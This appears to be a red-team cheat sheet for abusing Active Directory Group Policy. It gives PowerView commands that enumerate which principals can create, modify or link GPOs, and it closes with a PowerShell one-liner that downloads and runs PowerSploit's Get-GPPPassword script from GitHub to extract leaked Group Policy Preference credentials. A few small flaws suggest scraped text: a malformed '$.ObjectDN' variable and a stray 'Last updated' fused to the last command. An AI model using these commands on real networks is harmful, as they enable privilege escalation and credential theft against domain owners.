Enumeration
# Enumerate Who Can Create Policy
Get-DomainObjectAcl -ResolveGUIDs | where {$.ObjectDN -eq "CN=Policies,CN=System,DC=MARVEL,DC=local" -and $.ActiveDirectoryRights -match "CreateChild"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier
# OR
powershell Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
# Enumerate Who Can Modify/Edit Policy
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -match "^CN={[A-Z0-9-]*},CN=Policies" -and $_.ActiveDirectoryRights -match "Write"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN
# OR
powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl
# Enumerate Who Can Link Policy
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -match "^OU=" -and $_.ObjectAceType -match "GP-Link"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier,ObjectDN
# OR
powershell Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty|WriteDacl|WriteOwner" -and $_.SecurityIdentifier -match "S-1-5-21-3263068140-2042698922-2891547269-[\d]{4,10}" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl
# Domain Group Policy Preferences Leaked Credentials (https://adsecurity.org/?p=2288)
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1")
Get-GPPPasswordLast updated